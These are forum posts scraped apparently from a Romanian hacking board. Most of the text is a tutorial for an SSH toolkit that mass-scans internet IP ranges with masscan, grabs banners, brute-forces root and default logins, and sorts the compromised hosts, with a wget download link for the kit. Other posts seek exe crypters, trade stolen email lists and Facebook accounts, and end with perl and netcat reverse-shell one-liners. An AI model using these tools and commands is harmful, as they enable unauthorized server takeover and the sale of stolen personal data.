[SSH Brute force + BANNER GRABBER + SSH CHECKER]

INFO:

 

Quote

1. ssh2banner is for retriving the banner of the ssh server. The good thing is that you don't even need u/p, thus making this a very good tool of determining if is a proper ssh server
        INPUT FILE = `i`
        1.2.3.4
        3.3.3.3
        4.4.4.4

        OUTPUT
        1.2.3.4:22:SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu
        3.3.3.3:22:SSH-2.0-OpenSSH_3.7.1p2
        4.4.4.4:22:SSH-WHATEVER_BANNER

        EXAMPLE RUN
        ./ssh2banner <FORKS> <PORT> <TIMEOUT> <VIPCODE>

2. bssh2z (brute ssh) is for brute-forcing list of ips with various passwords
        INPUT FILE (list of ips) = `i`
        1.2.3.4
        3.3.3.3
        4.4.4.4

        INPUT FILE (list of user/pass combo) = `p`
        root $BLANKPASS
        admin admin
        user pass

        OUTPUT
        `n` -> nobash,busybox,honeypot,other linux
        root:r0ot:1.2.3.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
        root:r0ot:4.4.4.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
        root:r0ot:5.5.5.5:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
        root:r0ot:6.6.6.6:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.5

        `v` -> vuln,virtual,good linux
        root::7.7.7.7:22:Linux:SSH-2.0-OpenSSH_6.6:Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz:3764 2558 1206 0 166 336:vuln
        user:live:8.8.8.8:22:Linux:SSH-2.0-OpenSSH_6.0p1 Debian-4:Intel(R) Core(TM) i5 CPU 760 @ 2.80GHz:6040 1307 4732 0 135 633:vuln
        root::9.9.9.9:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 179 0 0 14317:vuln
        root::10.10.10.10:22:Linux:SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2:ARMv7 Processor rev 2 (v7l):492 281 210 12 47 109:vuln
        root::11.11.11.11:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 178 0 0 14317:vuln

        EXAMPLE RUN
        ./bssh2z <FORKS> <PORT> <TIMEOUT> <VIPCODE>

        If you put like 20 ips and 400 passwords and the scan works slow, don't worry, it is a fail2ban protection. It is pointless to finish them in 1 minute, thus you will get banned after the first 5 tries in less then a minute. It will finish it, have patience.

3. ssh2check (checker ssh) is for re-check your already N or V file from bssh2z to know what servers are still online
        INPUT FILE (list of ips) = `list.txt`
        root:r0ot:1.2.3.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
        root:r0ot:4.4.4.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
        root::7.7.7.7:22:Linux:SSH-2.0-OpenSSH_6.6:Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz:3764 2558 1206 0 166 336:vuln
        user:live:8.8.8.8:22:Linux:SSH-2.0-OpenSSH_6.0p1 Debian-4:Intel(R) Core(TM) i5 CPU 760 @ 2.80GHz:6040 1307 4732 0 135 633:vuln
        root::9.9.9.9:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 179 0 0 14317:vuln
        root:r0ot:5.5.5.5:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
        root:r0ot:6.6.6.6:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
        root::10.10.10.10:22:Linux:SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2:ARMv7 Processor rev 2 (v7l):492 281 210 12 47 109:vuln
        root::11.11.11.11:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 178 0 0 14317:vuln

        OUTPUT
        `others.txt` -> nobash,busybox,honeypot,other linux
        root:r0ot:1.2.3.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
        root:r0ot:4.4.4.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
        root:r0ot:5.5.5.5:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
        root:r0ot:6.6.6.6:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.5

        `servers.txt` -> vuln,virtual,good linux
        root::7.7.7.7:22:Linux:SSH-2.0-OpenSSH_6.6:Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz:3764 2558 1206 0 166 336:vuln
        user:live:8.8.8.8:22:Linux:SSH-2.0-OpenSSH_6.0p1 Debian-4:Intel(R) Core(TM) i5 CPU 760 @ 2.80GHz:6040 1307 4732 0 135 633:vuln
        root::9.9.9.9:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 179 0 0 14317:vuln
        root::10.10.10.10:22:Linux:SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2:ARMv7 Processor rev 2 (v7l):492 281 210 12 47 109:vuln
        root::11.11.11.11:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 178 0 0 14317:vuln

        EXAMPLE RUN
        ./ssh2check <FORKS> <PORT> <TIMEOUT> <VIPCODE>
 

 

 

Tutorial:

Quote

This is a tutorial that will learn you to efficiently scan SSH servers real fast.

#HoneyPot banners     -> SSH-2.0-Twisted and more
#Honeypot Ram or CPU  -> Ram: "7880 7690 189 0 400 5171" ; CPU: "Intel(R) Core(TM)2 Duo CPU E8200 @ 2.66GHz", some  "QEMU Virtual CPU version 1.7.0" but not all
#Good servers banners -> "SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1.2", "SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u6", "SSH-2.0-OpenSSH_6.6.1" and more, all OpenSSH its posible good
#Nobash banners       -> "SSH-2.0-dropbear", "SSH-2.0-IPSSH-1.10.0", "SSH-2.0-XXXX", "SSH-2.0-Parks", "SSH-2.0-ROSSSH", "SSH-1.99-Cisco-1.25" and more
#Shitty banners       -> "SSH-2.0-RomSShell_4.62", "SSH-1.99-cryptlib", "", and more
#Info: Only for uid0
########################################

password=unlimited
port=22
timeout=15
threads=500
ssSpeed=10
masscan_speed=20000

#########################################

rm -rf input.txt bios.txt i

./masscan $1 -p22 -oL input.txt --max-rate $masscan_speed --open --banners --exclude 255.255.255.255 --exclude 10.0.0.0/8 --exclude 192.168.0.0/16 --exclude 127.0.0.0/8  -sS -Pn -n --randomize-hosts -v --send-eth
./ss $port -a $1 -s $ssSpeed

So we have the bios.txt that containts a list of ips that have port 22 opened it is time to put it to the check with ssh2banner.

(banner ssh will read `i` file, also shuffeling ips)
        cat bios.txt | sort -u | shuf > i
        ./ssh2banner 150 22 10 YOUR_VIPCODE_PASSWORD;

We will use 150 forks (max ssh connection at a time), but you can put whatever number you want(500,1000), be carefull to not get your server banned or in ram/cpu load.

The ssh2banner is way faster then the bssh2z (brute-ssh) because it is just connecting to the server and getting the ssh-banner only without username/passowrd. It will generate an `banners.log` file that will contain data like this :
        1.2.3.4:22:SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu
        3.3.3.3:22:SSH-2.0-OpenSSH_3.7.1p2
        4.4.4.4:22:SSH-WHATEVER_BANNER

You will see a lot of banners, starting from OpenSSH to dropbear or some that you even heared about, like routers and other stuff. This list is perfect to do a brute-SSH attack on it, thus you are 100% that those are servers and not some other applications that are opened on port 22.

Retrieve just the ips from this list with this command :

        rm i;
        cat banners.log | cut -f ":" -f 1 > i;

        if you wish you can scan only dropbear
        cat banners.log | grep "dropbear" | cut -f ":" -f 1 > i;

        or cisco routers
        cat banners.log | grep "cisco" | cut -f ":" -f 1 > i;

Create a nice password file `p` begining with the user/pass combo "root $BLANKPASS", should look like this :
        root $BLANKPASS
        admin admin
        username password
        ...

then do a
        wc -l i p
         233214 i
                 18 p
         233232 total
        Looks ok

Now we will do a brute-SSH attack on those using this command
        ./bssh2z 150 22 10 YOUR_VIPCODE_PASSWORD;

You will see something like this going on:

        Current version : 2.5.1
        Last version : 2.4.1
        Counting PASS
        Counted [18] PASS
        Counting IPS
        Counted [233214] IPS
        There are [4197852] possible combinations
        Starting session 0
        Trying user/pass combo #1->[guest][]
        Combo [9 of 4197852] -> [178.27.29.115] with [guest][]
        Combo [4 of 4197852] -> [220.128.68.129] with [guest][]
        ...

        Duplicate NOBASH [128.54.202.72]
        Duplicate NOBASH [37.48.86.100]
        Combo [53262 of 4197852] -> [67.221.173.53] with [guest][]
        ....

You will see the checking process begin and from time to time check your `n`(non-bash servers) and `v`(good/vuln servers) files, should look like this :

        N
        root:r0ot:1.2.3.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
        root:r0ot:4.4.4.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
        root:r0ot:5.5.5.5:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
        root:r0ot:6.6.6.6:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51

        V
        root::7.7.7.7:22:Linux:SSH-2.0-OpenSSH_6.6:Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz:3764 2558 1206 0 166 336:vuln
        user:live:8.8.8.8:22:Linux:SSH-2.0-OpenSSH_6.0p1 Debian-4:Intel(R) Core(TM) i5 CPU 760 @ 2.80GHz:6040 1307 4732 0 135 633:vuln
        root::9.9.9.9:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 179 0 0 14317:vuln

        root::10.10.10.10:22:Linux:SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2:ARMv7 Processor rev 2 (v7l):492 281 210 12 47 109:vuln
        root::11.11.11.11:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 178 0 0 14317:vuln

And there you go. More than that, from time to time you can recheck them to see what servers are still online with ssh2check (checker-ssh)

        cat n v > list.txt;
        ./ssh2check 150 22 10 YOUR_VIPCODE_PASSWORD;

        it will output 2 files
        `others.txt` -> nobash,busybox,honeypot,other linux
        root:r0ot:1.2.3.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
        root:r0ot:4.4.4.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
        root:r0ot:5.5.5.5:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
        root:r0ot:6.6.6.6:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.5

        `servers.txt` -> vuln,virtual,good linux
        root::7.7.7.7:22:Linux:SSH-2.0-OpenSSH_6.6:Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz:3764 2558 1206 0 166 336:vuln
        user:live:8.8.8.8:22:Linux:SSH-2.0-OpenSSH_6.0p1 Debian-4:Intel(R) Core(TM) i5 CPU 760 @ 2.80GHz:6040 1307 4732 0 135 633:vuln
        root::9.9.9.9:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 179 0 0 14317:vuln
        root::10.10.10.10:22:Linux:SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2:ARMv7 Processor rev 2 (v7l):492 281 210 12 47 109:vuln
        root::11.11.11.11:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 178 0 0 14317:vuln

Happy scanning.
 

 

Download link: wget http://i9x0.com/bssh2z-full.tar; tar xvf bssh2z-full.tar; cd bssh2z-full; cat info.txt ; cat tutorial.txt

 

[servicii criptari]

caut crypter sau servicii criptari exe.

 

mai multe detalii pe jabber: eric@default.rs doar cu otr.

[Vand site/baza de date Filme si Seriale 8.000+]

Specific Romanesc. Toti sarlatanii morti de foame care cauta anturaj pe forumuri Romanesti, are rost sa va iau in calcul?

scuza-ma dar la ce te asteptai cand ai zis ca LICITATIA INCEPE DE LA 1$ ?

daca licitatia incepe de la 1$ inseamna ca asta e suma minima pe care o vrei. eu stiu ca la licitatii asa se bideaza, incepi de la suma minima si urci pana cand ramane unu singur care bideaza.

edit: cand scoti un produs la licitatie poti avea surpriza sa nu il vinzi cu cat te-ai asteptat. inainte de a organiza o licitatie te-ai interesat macar sa vezi care sunt regulile de baza ?

nu te supara pe mine dar explica-mi si mie ce intelegi tu prin licitatie.

ofer 4$

[Vand site/baza de date Filme si Seriale 8.000+]

Incep eu : 2$

Adjudecat !

3$ la mine. cand se opreste licitatia ?

[nologin]

salut, eu nu vand. incercati la ipsocks.pro

[Ce pot cumpara prin Sms?]

dar dc sa nu ti scoti banii direct gen iti faci cont pe Hipay - Mobile Payments ca si cum ai vinde ceva prin sms si o cantitate de bani iti vin directi tie acuma depinde si de cate sms poti trimite ...etc

daca creditul este furat sa cumparat prin diverse metode ne crestine o sa ii blocheze banii, in plus astia cer acte, ca persoana fizica e mai greu sa faci rost de un api ptr sms-uri.

[[VAND] VPS-uri cu 4 EURO bucata.]

https://rstforums.com/forum/30346-regulament-rst-market-post549543.rst#post549543

Fara UP-uri. Warn pentru FIECARE up sau post inutil pe post de "up" il vad.

@Nytro

[ITmpotenta romaneasca]

Imbunatatirea solutiilor de securitate nu reprezinta o scuza pentru lenea de a face research, pentru ca, fata de 2004, 2008, sau chiar 2013, exista mult mai multe unelte la dispozitia tuturor pentru a da atacuri violente, cu sanse mult mai mari de reusita fata de anii precedenti.

Degeaba daca uneltele astea nu sunt integrate toate intr-un ./start.

Nu mai e ce a fost, pana si legile s-au schimbat si cel mai probabil lumea nu mai are sange-n pula, au devenit toti niste pizde iar astia micii nu au un mentor care sa ii invete sau sa le arate diverse lucruri, sa le schimbe mentalitatea, sa ii formeze, toti sunt pusi pe furat, tepuit sau vor sa faca bani. Toti cauta metode de monetizare, sunt putin aia care inca fac din pasiune lucrurile care se faceau cu ani in urma fara sa se gandeasca la bani. De ce sa porneasca atacuri violente si sa riste ani grei cand pot sta linistiti pe pula lor castigand 1000e / luna dintr-un site dedicat filmelor online sau muncind ca freelanceri pe bani de nimic ?

[cpanels/root Passwords in server]

[root@centos64 shm]# php pass.php

Your request is blocked due to invalid referrer. If you are trying to hotlink this page, please use: http://pastebin.com/raw.php?i=2QLznV24[root@centos64 shm]#

ma ajuta cineva ?

un administrator care sa iti dea ban, numa cereri si porcarii faci prin ultimele posturi. mai ales ca asta e un topic de acu un an de zile

[Nologin europa !!]

tu meriti m**e, ma !

https://rstforums.com/forum/104252-nologin.rst

https://rstforums.com/forum/105318-nologin-europa.rst

https://rstforums.com/forum/105722-nologine.rst

[Gratuitati (pentru utilizatorii vechi)]

vreau si eu:

themeforest-6928979-wharton-a-big-bold-wordpress-blog-theme.zip

themeforest-7758048-betheme-responsive-multipurpose-wordpress-theme.zip

themeforest-8025199-caps-responsive-news-magazine-wordpress-theme.zip

themeforest-8047638-mokka-minimal-elegant-wordpress-blog.zip

[Nelamurire site-uri filme online]

Este simplu. Cat timp nu ai surse video pe host, fortezi lumea la plata, nimeni nu iti face nimic. Iti poate bloca domeniul .ro dar se poate face altul si in 1 ora maxim esti iar online.

nu vreau sa par indiscret dar domeniile pe .ro le platesti online sau transfer bancar cu numele tau ? daca da, nu ma judeca dar e o prostie si iti zic si de ce, pirateria este pedepsita si e usor sa se ajunga la tine, eu unu daca mi-as face site de filme online mi-as face pe com, un domeniu luat cu btc. nu stiu daca e ok sa-ti apara numele la whois si sa-ti bata astia la usa.

ps: nu vreau sa te judec, incerc doar sa iti dau un sfat. oricum pe mine m-ai lamurit cu anumite lucruri. multumesc ptr ca ti-ai pierdut din timp sa explici pe intelesul tuturor ce se intampla in spatele unui site de filme online.

[50.000 de romani risca amenzi pentru pariuri pe site-uri interzise. B365.com ...]

pai si cum isi dau ei seama ca joc eu la bet365 ?

[Cumpar cont Adsense.]

Mare branza sa faci un cont de adsense si sa-l confirmi

pai cred ca e daca ai mai avut conturi blocate in trecut

[Legea Big Brother]

Încet încet se cam duce tot ce înseamn? spa?iu personal. Acum pot sa vad? legal ce site accesam, când ?i de pe ce pc / telefon.

Se poate evita asta?

se poate folosind servicii de vpn cu cele mai bune criptari.

[Pagina Facebook 30k]

ma bag si eu ca musca-n lapte, ma poate lumina si pe mine ce inseamna "Acoperire" si "Interactii" ??

[7 milioane mailuri]

7MillionEmails(3)

7 milioane mailuri trase din diferite surse

[cumpar conturi fb si/sau loguri]

// rezolvat

[[VAND]Conturi de facebook sau 3.4 Mb logs]

mai ai conturi de fb ? sunt interesat

[Mailuri Italia, SUA, UK si alte tari]

mai ai mailuri de ro ? ma intereseaza.....

[Adrese de e-mail din Romania]

mai e valabil ? m-ar interesa niste mailuri de ro

[Tata are cancer. Daca puteti sa ma ajutati...]

verifica bitcoinu, sa fie intr-un ceas bun. stiu ce inseamna sa aibe un membru al familiei cancer.

[Tata are cancer. Daca puteti sa ma ajutati...]

@GarryOne Iti multumesc mult!

Nu va mai faceti griji in privinta sumei, deoarece orice leu este foarte bun.

Nu cancerul ma sperie cel mai tare, ci lipsa banilor de a lupta cu el.

Sunt o persoana sensibila si nu as suporta gandul ca tata a murit pentru ca n-am avut bani sa-i iau ce-i trebuie.

o adresa de btc ar fi mult mai ok ptr donatii si chiar aici pe forum ii poti transforma in cash (spooky are thread la rstmarket), poti vorbi cu el poate iti scade comisionul .

[Probleme cu CloudFlare]

da mai multe detalii si incarca sa ne zici si ce setari ai in cloudflare

[A Sh0rt Line C0de]

Netcat

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"127.0.0.1:443");STDIN->fdopen($c,r);$~->fdopen($c,w);exec("/bin/sh");'

netcat -e /bin/sh 127.0.0.1 443